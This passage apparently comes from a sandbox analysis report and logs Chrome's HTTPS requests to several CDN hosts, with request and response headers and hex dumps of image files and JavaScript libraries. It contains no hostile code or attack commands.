                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:03 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 88636
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:25 GMT
                                                                                                                                                          ETag: "5d71fe69-15a3c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[6],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,4],EU-GER-frankfurt-GLOBAL1-CACHE4[25],EU-GER-frankfurt-GLOBAL1-CACHE1[0,TCP_HIT,21],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1698781
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 166d412f4e7c34013c1fecf7fdf054c6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 893219
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:03 UTC15758INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b5 00 00 01 ad 08 06 00 00 00 50 a1 35 eb 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 77 b8 66 d9 55 df 89 7f 76 38 f1 8d 37 57 0e 5d d5 39 29 27 04 08 90 c0 12 62 6c c2 18 03 1e d2 80 13 38 8c 6d cc d8 23 23 03 b2 0d 4e 78 fc 73 c2 c6 09 c1 8f 60 e3 00 06 21 90 90 90 5a 19 3a 49 9d d4 dd d5 95 eb e6 37 9f bc f7 9e 3f ce 79 df aa ea 6e 05 2b a0 6e 49 eb 79 4e dd aa 5b 37 9c b3 cf da 6b af f0 5d df 25 78 9a c8 67 fc 6d fe d1 02 16 3b ff 9c 9c 7f be 02 c7 67 2e 9f cd f7 7e be 45
                                                                                                                                                          Data Ascii: PNGIHDRP5gAMAa cHRMz&u0`:pQ<bKGDCIDATxwfUv87W]9)'bl8m##Nxs`!Z:I7?yn+nIyN[7k]%xgm;g.~E
                                                                                                                                                          2024-06-09 22:41:03 UTC16384INData Raw: 8e af 78 3d 87 6e 79 39 e0 e3 94 8f 90 3e 95 13 8d b1 11 f3 15 c4 39 8b e7 fb 48 a9 28 cb 6a 51 52 77 ce d5 84 95 5a 53 96 25 e3 f1 98 fd fd 7d 82 20 a0 28 8a ab 95 47 a5 40 48 fc d0 63 3a 4b d1 52 d6 41 75 13 78 6a 5d af a1 73 50 99 0a d1 fc 6e a5 14 ce 42 af df 7d c1 bd f7 de fb e8 cf ff fc cf 3f 7c ad 6f 3d e7 31 b1 d6 2e aa 9e cf 76 7d 3e 44 eb c0 8f 26 c3 01 fd b5 03 bc f2 ab 5f cb 6f fe f7 b7 b2 33 d8 a3 d3 6a e3 7b 01 a6 34 48 e7 70 38 ac 75 b5 9b 6d 6d 93 ab b6 54 56 92 1b c1 d2 da 01 82 b8 55 e3 32 a8 2d ee b3 b5 17 cd 5d 04 f7 09 4a f0 65 59 e3 38 a4 54 8c 46 43 8a a2 60 6d 6d 8d 34 cd f0 bc da 3a c3 d5 2e 0f d5 58 a2 ba c3 bd 1e c3 2c 44 bd 39 aa aa 44 6b 6f e1 b6 18 53 e2 d5 3c 25 d7 05 36 c6 d4 41 96 b1 16 af b1 36 d6 18 fc a6 d7 b0 df eb d1
                                                                                                                                                          Data Ascii: x=ny9>9H(jQRwZS%} (G@Hc:KRAuxj]sPnB}?|o=1.v}>D&_o3j{4Hp8ummTVU2-]JeY8TFC`mm4:.X,D9DkoS<%6A6
                                                                                                                                                          2024-06-09 22:41:03 UTC16384INData Raw: c7 f4 d4 49 92 d5 59 a6 c4 b4 d2 a4 2d 44 69 28 cf 3a 43 18 f8 46 80 61 54 ad 12 c6 75 3d cd b1 56 66 8f 8f 3d f6 59 2e 5d ba c4 fb de f7 3e de f3 9e f7 d0 eb f5 b0 2c b3 7d d3 83 8e 3a b9 2b 0f 39 85 a2 98 da bb 24 08 02 2c 4b 99 31 de bc b9 c5 73 cf 3f c7 93 4f 3c c9 a5 4b 97 79 cb 5b de 82 6d db 9c 3d 7b 96 f7 bf ef fd 74 bb 5d 5c d7 65 36 9b d1 eb 75 b8 74 e9 32 8f 3f f9 45 ae 5d bb 46 55 95 5c bd 72 95 2c cf 5a 14 a4 ae 6b 56 57 d5 21 2c 4d 53 76 76 76 78 ea c9 27 f9 d0 87 3e c4 c3 0f 3e 48 12 27 2a d7 b1 db e5 3d ef 7d 2f 17 2e 5c 60 77 77 57 df 85 96 3a 86 4f 11 ae 7a bd 5e 5b 4c 69 aa 6c 20 9a dd 51 48 c5 dd 10 da 1a 59 18 c6 fd a6 94 8e 61 3b 79 dd 64 ed 08 95 79 5e 17 05 ef 79 f7 7b 9e fa cc 63 9f f9 3b c0 7f e7 79 fe 66 92 c4 be 61 08 61 db 16
                                                                                                                                                          Data Ascii: IY-Di(:CFaTu=Vf=Y.]>,}:+9$,K1s?O<Ky[m={t]\e6ut2?E]FU\r,ZkVW!,MSvvvx'>>H'*=}/.\`wwW:Oz^[Lil QHYa;ydy^y{c;yfaa
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: ba a4 86 e7 3a 9d 00 db 52 5f 2b 85 c0 40 91 fa 1b e7 d2 e2 16 18 ae c9 78 59 86 4b 56 7c 75 a8 8c c2 a8 1d a3 87 61 48 ed b8 0c fa 7d 00 e6 f3 39 83 e1 80 d5 95 55 16 8b 05 eb eb 1b 9c 3b 77 8e ed ad 6d a2 38 42 4a a7 a5 ca 86 61 c4 f6 f6 16 47 8f 1c 65 34 1c 21 85 24 8a 23 8a b2 40 0a 89 90 42 59 f8 86 4b fa 83 be 22 43 45 21 b6 6d 29 13 f7 6e 8f 17 9f fc 02 b3 38 63 37 4c 28 dd 80 77 be ef 83 f4 86 1b bc 74 f1 06 ab 9b c7 30 1d 1b cb 76 a8 8d 8a a4 86 24 2b e8 ac ac 23 bc 80 83 c5 02 b1 bf ef 6e ae 6f fc 7f f2 ba fe 36 69 99 f5 6d f1 b3 c6 6b 08 77 bc 6c dd 51 ed 47 a3 7a 6e 24 4f 86 21 f8 b6 df f7 fb df bb ba ba fa 41 a9 cd 19 55 ef 6c 61 5b 16 c2 30 5a c3 f5 46 30 ed 79 1e b6 65 2b a2 14 90 44 f1 6d 5c 8f 56 a8 ab 63 93 8b 5c 91 79 fc c0 d7 41 47 25
                                                                                                                                                          Data Ascii: :R_+@xYKV|uaH}9U;wm8BJaGe4!$#@BYK"CE!m)n8c7L(wt0v$+#no6imkwlQGzn$O!AUla[0ZF0ye+Dm\Vc\yAG%
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: b5 b8 1b 93 93 d3 d0 ca 2f 99 51 0d f2 d4 c0 a4 b6 e8 36 87 40 96 19 48 a1 30 33 37 8f bd 07 0f a3 3d 3d 83 dc 59 ac 6f ac 97 ed 5f 06 c4 80 62 e7 99 74 20 1c 8a bb c5 70 08 fc f3 7f f1 c7 ce 48 7d 0e 4a e4 86 33 90 e0 72 42 81 d8 b2 54 f5 ce d5 60 22 57 b3 04 c4 e8 1a 20 28 51 ce 35 07 41 48 80 5d 0e 93 a7 c8 d2 18 59 32 44 bf d3 85 22 e5 d6 96 d7 63 cb 65 81 29 6f 7e c7 95 c0 f6 0e a8 5f ae 6c 56 3a 20 35 19 a4 00 58 b5 ef 8d fd a9 4f d3 c4 3c 58 49 48 b2 08 3d 8d c9 c9 29 c4 83 21 06 dd 1e 92 61 8c 7e b7 8f 4e a7 83 6e 6f 03 fd 41 17 c9 70 80 7e a7 0b 97 66 b0 49 06 a9 7d ec 3a 72 2d 26 f7 1d 46 06 8d 24 b5 18 74 7b 20 63 20 5c 0e b6 99 f0 14 28 a0 cd 4e ab 0c c0 c0 84 6b 90 f2 dc e4 54 b3 28 46 62 06 b8 d0 bf 8e 3d 38 16 b0 4c 48 b2 14 b6 2c b8 82 10
                                                                                                                                                          Data Ascii: /Q6@H037==Yo_bt pH}J3rBT`"W (Q5AH]Y2D"ce)o~_lV: 5XO<XIH=)!a~NnoAp~fI}:r-&F$t{ c \(NkT(Fb=8LH,
                                                                                                                                                          2024-06-09 22:41:04 UTC7342INData Raw: 1e ca ab 87 f3 b6 cb 4c 8e 03 19 d8 aa a1 c7 cb 54 eb f1 df d1 e1 e9 76 bb fa c1 87 1e f2 8e 1e 39 86 1f fc e0 07 e8 f7 07 c8 b2 1c 87 0f 1f c6 4d 37 df 80 dd 8b f3 b0 c6 82 04 43 2b 3d e2 da ab 64 d0 1f 40 b5 14 7e f0 83 1f b0 92 aa da 97 2a fa 51 8f 70 d4 43 79 d5 b6 19 5c 6c 2b 8f 9d 3e ae 3b 97 ae bc 53 8e 32 af 61 18 5e 94 5d ad 9a 95 4b de bf 57 bc 52 ef 8a 83 ba ba 42 07 83 01 0d 87 43 8a e3 18 61 18 52 96 65 d4 6c 36 ab 82 fd 51 a9 29 5e 5c 3b 8e 83 b7 0e b8 17 0b e1 6d 67 a2 6c 97 46 af 5f 00 a8 ad 33 5e c9 57 69 af fa f6 a1 b6 cd f5 c4 cc f8 fe 30 00 8a e3 d8 9d 3c 71 62 f8 f6 b7 bd 13 ce 5a b4 db 6d bc f7 bd ef c5 cd 37 df 8a 2c 4f 60 f2 22 32 a7 4b 1a 84 b2 3d 6b 24 44 84 24 49 38 6a 44 5c 26 97 ea f1 e9 2a 8c 57 01 1c b5 df ae fe 57 a6 43 7d
                                                                                                                                                          Data Ascii: LTv9M7C+=d@~*QpCy\l+>;S2a^]KWRBCaRel6Q)^\;mglF_3^Wi0<qbZm7,O`"2K=k$D$I8jD\&*WWC}


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          263192.168.2.550011183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:03 UTC540OUTGET /ftl/commonPage/js/lazyload.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:04 UTC713INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 12153
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XIANY-MP-05-29
                                                                                                                                                          ETag: "64d05f66-2f79"
                                                                                                                                                          Date: Fri, 07 Jun 2024 23:37:01 GMT
                                                                                                                                                          Last-Modified: Mon, 07 Aug 2023 03:05:10 GMT
                                                                                                                                                          Expires: Sun, 07 Jul 2024 23:37:01 GMT
                                                                                                                                                          Age: 169442
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xianymp05:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XIANY-MP-05-29
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-08
                                                                                                                                                          X-Cdn-Request-ID: d7d10e528a97991e17de6ff45dcac397
                                                                                                                                                          2024-06-09 22:41:04 UTC12153INData Raw: 2f 2a 21 0a 20 2a 20 4c 61 7a 79 20 4c 6f 61 64 20 2d 20 4a 61 76 61 53 63 72 69 70 74 20 70 6c 75 67 69 6e 20 66 6f 72 20 6c 61 7a 79 20 6c 6f 61 64 69 6e 67 20 69 6d 61 67 65 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 37 2d 32 30 31 39 20 4d 69 6b 61 20 54 75 75 70 6f 6c 61 0a 20 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 3a 0a 20 2a 20 20 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 6d 69 74 2d 6c 69 63 65 6e 73 65 2e 70 68 70 0a 20 2a 0a 20 2a 20 50 72 6f 6a 65 63 74 20 68 6f 6d 65 3a 0a 20 2a 20 20 20 68 74 74 70 73 3a 2f 2f 61 70 70 65 6c 73 69 69 6e 69 2e 6e 65 74 2f 70 72 6f 6a 65 63 74 73 2f
                                                                                                                                                          Data Ascii: /*! * Lazy Load - JavaScript plugin for lazy loading images * * Copyright (c) 2007-2019 Mika Tuupola * * Licensed under the MIT license: * http://www.opensource.org/licenses/mit-license.php * * Project home: * https://appelsiini.net/projects/


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          264192.168.2.550010183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:03 UTC625OUTGET /ftl/commonPage/zh_CN/mobileTopic/images/special_3.jpg HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC641INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 6871
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-CHANGZ-MP-01-10
                                                                                                                                                          ETag: "5d848f4f-1ad7"
                                                                                                                                                          Date: Thu, 06 Jun 2024 07:42:06 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 07:42:06 GMT
                                                                                                                                                          Age: 313137
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;changzmp01:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-CHANGZ-MP-01-10
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-01
                                                                                                                                                          X-Cdn-Request-ID: 0e2fea310966a73fc6a723a8632ad614
                                                                                                                                                          2024-06-09 22:41:03 UTC6871INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 32 20 37 39 2e 31 36 30 39 32 34 2c 20 32 30 31 37 2f 30 37 2f 31 33 2d 30 31 3a 30 36 3a 33 39 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Ducky</http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          265192.168.2.550018183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:03 UTC540OUTGET /ftl/commonPage/js/gui-base.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:04 UTC710INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 15779
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-HUZ-MP-04-06
                                                                                                                                                          ETag: W/"64ddbaed-ee5c"
                                                                                                                                                          Date: Thu, 06 Jun 2024 22:03:27 GMT
                                                                                                                                                          Last-Modified: Thu, 17 Aug 2023 06:15:09 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 22:03:27 GMT
                                                                                                                                                          Age: 261456
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;huzmp04:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-HUZ-MP-04-06
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-32
                                                                                                                                                          X-Cdn-Request-ID: 965371771d60d474b61cf6e9ad001acc
                                                                                                                                                          2024-06-09 22:41:04 UTC15674INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 7d fd 97 1b c7 71 e0 cf e6 5f 31 3b 5a ef ce 2c 06 58 80 34 65 0b d8 d9 7d e4 92 b4 68 4b 22 45 52 92 93 bd 95 de 00 18 2c 86 c4 62 20 60 c0 25 b5 8b 7b 4a 62 47 92 2d c5 8a f3 61 c7 71 72 96 e3 17 e9 e9 22 39 f7 12 df 39 b2 7d f9 e1 fe 94 d3 2e c9 9f f2 2f 5c 55 57 77 4f f7 4c cf 00 4b 4a 79 ef 60 8b 3b d3 1f d5 55 d5 55 d5 d5 d5 1f 63 ad af 2d 9d b1 d6 ac 6f 06 fb e1 c5 f8 de 4b 57 ab df ba 59 6d 07 93 d0 72 8e ff db 67 0f 3e 78 f3 e1 77 7f 7a f2 b3 7f fa 8f df bd 83 a5 ee 86 e3 49 14 0f ad 46 ad 5e 6b 60 c2 85 69 d2 8f c7 4d eb 66 12 de 0d 87 98 72 29 48 42 6b 3f ee 46 bd 28 ec 5a 67 eb 8d af 57 eb 5f ab 9e 7d 06 f2 d6 cf 58 ac 35 5f fe ac 4e bc bf 1f 0f ab c7 df fb a7 e3 ef fd 0f 6a 4a c9 a6 3a bd e9 b0 93 60 ab e3 70
                                                                                                                                                          Data Ascii: }q_1;Z,X4e}hK"ER,b `%{JbG-aqr"99}./\UWwOLKJy`;UUc-oKWYmrg>xwzIF^k`iMfr)HBk?F(ZgW_}X5_NjJ:`p
                                                                                                                                                          2024-06-09 22:41:04 UTC105INData Raw: e9 af b6 94 50 16 e4 ca c3 93 9c 1f b1 b9 f9 64 67 55 02 b0 18 84 d5 dd 54 c6 67 2e 33 05 40 04 a7 51 60 88 a6 bd 0f 36 31 1c 57 93 08 2f 0c e7 57 1e 9d d1 da cd 95 a2 9b f8 5a 92 35 4b a2 bb 55 ca f5 5a 56 2d 4e fa f0 d8 e9 8f d5 66 8a 0a 77 71 af 54 8d 0d 40 4e e3 7c 5d d1 d7 59 eb ff 01 44 bd cf 01 5c ee 00 00
                                                                                                                                                          Data Ascii: PdgUTg.3@Q`61W/WZ5KUZV-NfwqT@N|]YD\


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          266192.168.2.55002047.246.46.2434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:04 UTC561OUTGET /ocs/cc.png?1717972860984 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://yh8613.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:04 UTC419INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:04 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache33.l2hk3[7,0], cache7.l2sg3[41,0], ens-cache11.it4[229,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: 2ff62e9f17179728645127167e
                                                                                                                                                          2024-06-09 22:41:04 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          267192.168.2.55002223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:04 UTC540OUTGET /pc/240516-03/static/js/t4044.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:04 UTC631INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:04 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 81660
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 09:01:37 GMT
                                                                                                                                                          ETag: "6645cb71-13efc"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[6],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE21[4],EU-FRA-paris-GLOBAL1-CACHE15[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473803
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: bc26914e6699d1d3c63fcba19858bf39
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118197
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
